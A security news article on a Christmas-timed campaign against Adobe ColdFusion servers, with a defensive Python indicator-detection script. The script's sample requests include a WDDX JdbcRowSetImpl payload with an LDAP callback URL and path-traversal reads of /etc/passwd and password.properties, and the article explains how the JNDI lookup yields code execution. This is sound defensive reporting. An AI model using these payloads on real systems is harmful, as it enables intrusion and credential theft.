
Security research from GreyNoise revealed that a single Japan-based threat actor operating through CTG Server Limited’s infrastructure executed a targeted holiday attack, with 68% of traffic concentrated on Christmas Day, when security monitoring is typically reduced.

The attack campaign demonstrates a deliberate operational strategy. Two primary IP addresses (134.122.136.119 and 134.122.136.96) generated 5,940 requests targeting 10+ ColdFusion CVEs published between 2023 and 2024.
The threat actor used Interactsh, ProjectDiscovery's open-source out-of-band interaction server, to verify exploitation: 190 distinct callback domains were observed. A JNDI lookup against one of those domains only fires if the target actually deserialized the payload, so each callback is a positive confirmation of a vulnerable host with no need to inspect the HTTP response.
The callbacks showed payloads landing on ColdFusion installations in 20 countries, with 4,044 of the sessions involving targets in the United States.
The primary attack vector was JNDI/LDAP injection through WDDX deserialization, accounting for 80% of observed payloads.
ColdFusion's WDDX deserializer instantiates the Java class named in the packet and populates its properties, and the attackers named com.sun.rowset.JdbcRowSetImpl: setting its dataSourceName to an ldap:// URL and then autoCommit triggers a JNDI lookup against the attacker's domain. With Interactsh as the LDAP target the lookup only confirms that the vulnerable code path fired; pointed at an attacker-controlled LDAP server, the same lookup yields remote code execution on unpatched instances.
Additional exploitation attempts were local file inclusion (arbitrary file read) requests for /etc/passwd, the standard proof-of-read canary, and ColdFusion's password.properties, which stores the administrator password hash.
Analysis revealed that this ColdFusion campaign accounts for only 0.2% of a much larger reconnaissance operation.
The same two IP addresses generated approximately 2.5 million requests in total, targeting 767 distinct CVEs across 47 technology stacks, including Java application servers, CMS platforms, network devices, and enterprise applications.
This suggests the attackers are operating as an initial access broker, systematically identifying vulnerable infrastructure for potential sale to downstream threat actors.
The infrastructure analysis reveals concerning patterns. CTG Server Limited, a Hong Kong-registered provider operating AS152194, has a documented history of abuse.
Research from Silent Push identified this ASN as the top network hosting phishing domains targeting luxury brands such as Chanel and LVMH.
BGP analysis shows the provider announces bogon routes (reserved or unallocated address space), a sign of poor routing hygiene.
Organizations running Adobe ColdFusion should patch the listed CVEs immediately, alert on DNS or LDAP resolution of Interactsh callback domains from application servers, and block the identified actor IP addresses, bearing in mind that source IPs are the cheapest indicator for an actor to rotate. Because the observed chain depends on the ColdFusion host making an outbound JNDI/LDAP connection, denying outbound LDAP and RMI from application servers by default blunts this class of payload regardless of which CVE delivers it.
The holiday timing of this campaign underscores the importance of maintaining security operations continuity regardless of calendar schedules.
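As an added example, not code from GreyNoise or from the article, the following Python script shows how the indicators described above can be checked against web-server requests: the JdbcRowSetImpl gadget name inside a WDDX body, a JNDI provider URL, a callback host under a public Interactsh apex domain, the credential-file paths used in the LFI attempts, and the two source IPs. The Interactsh apex-domain list is an assumption based on ProjectDiscovery's public default servers and should be extended with any self-hosted domain; the sample requests are constructed for illustration, not captured campaign traffic.

```python
"""Indicator checks for the ColdFusion campaign described above (added example)."""
import re
from urllib.parse import unquote

# Assumption: apex domains of ProjectDiscovery's public Interactsh servers.
# Add the domain of any self-hosted Interactsh instance you also want to catch.
INTERACTSH_APEX = frozenset(
    {"oast.pro", "oast.live", "oast.site", "oast.online", "oast.fun", "oast.me"}
)

# The two source addresses named in the article.
ACTOR_IPS = frozenset({"134.122.136.119", "134.122.136.96"})

# Gadget class behind the WDDX deserialization payloads (80% of traffic).
GADGET_CLASS = "com.sun.rowset.JdbcRowSetImpl"

# JNDI provider URLs; the authority part is captured for callback-domain matching.
JNDI_URL = re.compile(r"\b(?:ldaps?|rmi|iiop|dns)://([^/\s\"'<>]+)", re.IGNORECASE)

# Files the article lists as targets of the LFI / arbitrary-read attempts.
LFI_TARGETS = ("/etc/passwd", "password.properties")


def is_interactsh_host(host: str) -> bool:
    """True if host is an Interactsh apex domain or any subdomain of one.

    Callbacks use random labels (e.g. c1s9xkq.oast.fun), so suffix matching is
    required; userinfo and port, if present in a URL authority, are stripped.
    """
    bare = host.lower().rstrip(".").rsplit("@", 1)[-1].split(":", 1)[0]
    labels = bare.split(".")
    return any(".".join(labels[i:]) in INTERACTSH_APEX for i in range(len(labels) - 1))


def classify_request(src_ip: str, path: str, body: str) -> list[str]:
    """Return the indicator tags fired by one HTTP request (empty list = nothing seen).

    Path and body are URL-decoded first because the WDDX packet usually travels
    inside a query-string or form parameter.
    """
    text = unquote(path) + "\n" + unquote(body)
    tags = []
    if src_ip in ACTOR_IPS:
        tags.append("known-actor-ip")
    if GADGET_CLASS in text:
        tags.append("wddx-jdbcrowsetimpl-gadget")
    hosts = [m.group(1) for m in JNDI_URL.finditer(text)]
    if hosts:
        tags.append("jndi-lookup-url")
    if any(is_interactsh_host(h) for h in hosts):
        tags.append("interactsh-callback")
    if any(target in text for target in LFI_TARGETS):
        tags.append("lfi-credential-file")
    return tags


def scan(requests):
    """Map request index -> tags for every request that fired at least one indicator."""
    hits = {}
    for i, (src_ip, path, body) in enumerate(requests):
        tags = classify_request(src_ip, path, body)
        if tags:
            hits[i] = tags
    return hits


# Constructed sample traffic for illustration; not captured campaign data.
SAMPLE_REQUESTS = [
    # WDDX packet naming the gadget, with an LDAP dataSourceName pointing at an
    # Interactsh-style callback host.
    ("134.122.136.119", "/example.cfc?method=test",
     '<wddxPacket version="1.0"><data><struct type="com.sun.rowset.JdbcRowSetImpl">'
     '<var name="dataSourceName"><string>ldap://c1s9xkq.oast.fun/a</string></var>'
     '<var name="autoCommit"><boolean value="true"/></var></struct></data></wddxPacket>'),
    # Traversal read of /etc/passwd from the second actor IP.
    ("134.122.136.96", "/example.cfm?file=../../../../etc/passwd", ""),
    # URL-encoded traversal toward ColdFusion's password.properties from an unlisted IP.
    ("203.0.113.7", "/example.cfm?file=..%2F..%2Flib%2Fpassword.properties", ""),
    # Benign request.
    ("198.51.100.20", "/index.cfm?page=about", ""),
]

if __name__ == "__main__":
    for i, tags in scan(SAMPLE_REQUESTS).items():
        src_ip, path, _ = SAMPLE_REQUESTS[i]
        print(f"{src_ip:<16} {path[:45]:<45} {', '.join(tags)}")
```

The gadget and JNDI checks are independent on purpose: a request that names JdbcRowSetImpl without a JNDI URL, or carries an ldap:// URL to a host outside the Interactsh list, still surfaces, which matters once the actor moves from confirmation callbacks to a real LDAP server. Suffix matching on the callback host avoids the false negatives a plain substring check on "oast" would hide behind random labels, and avoids the false positives it would raise on unrelated domains.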
Observed request volume by targeted CVE:

| CVE ID | Vulnerability Type | Requests | Severity |
|---|---|---|---|
| CVE-2023-26359 | Deserialization RCE | 833 | Critical |
| CVE-2023-38205 | Access Control Bypass | 654 | High |
| CVE-2023-44353 | Remote Code Execution | 611 | Critical |
| CVE-2023-38203 | Remote Code Execution | 346 | Critical |
| CVE-2023-38204 | Remote Code Execution | 346 | Critical |
| CVE-2023-29298 | Access Control Bypass | 342 | High |
| CVE-2023-29300 | Remote Code Execution | 176 | Critical |
| CVE-2023-26347 | Access Control Bypass | 171 | High |
| CVE-2024-20767 | Arbitrary File Read | 146 | High |
| CVE-2023-44352 | Reflected XSS | 8 | Medium |
The post Over 2.5 Million Malicious Requests Target Adobe ColdFusion Servers appeared first on Cyber Security News.
